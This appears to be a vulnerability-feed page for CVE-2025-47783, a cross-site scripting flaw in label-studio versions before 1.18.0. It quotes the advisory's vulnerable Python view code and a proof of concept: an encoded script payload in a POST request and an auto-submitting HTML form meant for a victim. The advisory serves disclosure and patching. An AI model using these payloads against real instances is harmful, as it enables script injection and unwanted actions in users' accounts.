AI Threat Alert

CVE-2025-47783

GHSA-8jhr-wpcm-hh4h HIGH
Published May 15, 2025

### Summary The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other...

Full analysis pending. Showing NVD description excerpt.

Affected Systems

Package Ecosystem Vulnerable Range Patched
label-studio pip < 1.18.0 1.18.0

Do you use label-studio? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.2%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
N/A

Recommended Action

Patch available

Update label-studio to version 1.18.0

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Technical Details

NVD Description

### Summary The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks. ### Details The vulnerability is reproducible when sending a properly formatted request to the `POST /projects/upload-example/` endpoint. In the source code, the vulnerability is located at `label_studio/projects/views.py`. ```python 39: @require_http_methods(['POST']) 40: def upload_example_using_config(request): 41: """Generate upload data example by config only""" 42: config = request.POST.get('label_config', '') 43: 44: org_pk = get_organization_from_request(request) 45: secure_mode = False 46: if org_pk is not None: 47: org = generics.get_object_or_404(Organization, pk=org_pk) 48: secure_mode = org.secure_mode 49: 50: try: 51: Project.validate_label_config(config) 52: task_data, _, _ = get_sample_task(config, secure_mode) 53: task_data = playground_replacements(request, task_data) 54: except (ValueError, ValidationError, lxml.etree.Error): 55: response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST) 56: else: 57: response = HttpResponse(json.dumps(task_data)) 58: return response ``` The vulnerability is specifically located in line 57, where HttpResponse is used. ```python 57: response = HttpResponse(json.dumps(task_data)) ``` ### PoC Send the following request after changing the `{host}` to your own. ```css POST /projects/upload-example/ HTTP/1.1 Host: {host} Content-Type: application/x-www-form-urlencoded Content-Length: 67 label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e ``` Or you can create a vulnerable HTML page by changing `{domain}` beforehand, which can later be sent to the victim. ```html <html> <body> <form action="http://{domain}/projects/upload-example/" method="POST"> <input type="hidden" name="label&#95;config" value="&lt;View&gt;&lt;Text&#32;name&#61;&quot;text&quot;&#32;value&#61;&quot;&#36;textjmwwi&amp;lt&#59;script&amp;gt&#59;alert&#40;1&#41;&amp;lt&#59;&#47;script&amp;gt&#59;s8m37&quot;&#47;&gt;&lt;&#47;View&gt;" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` ### Impact - Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing `document.cookie`, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary

References

Timeline

Published
May 15, 2025
Last Modified
May 15, 2025
First Seen
March 24, 2026
Back to Threat Feed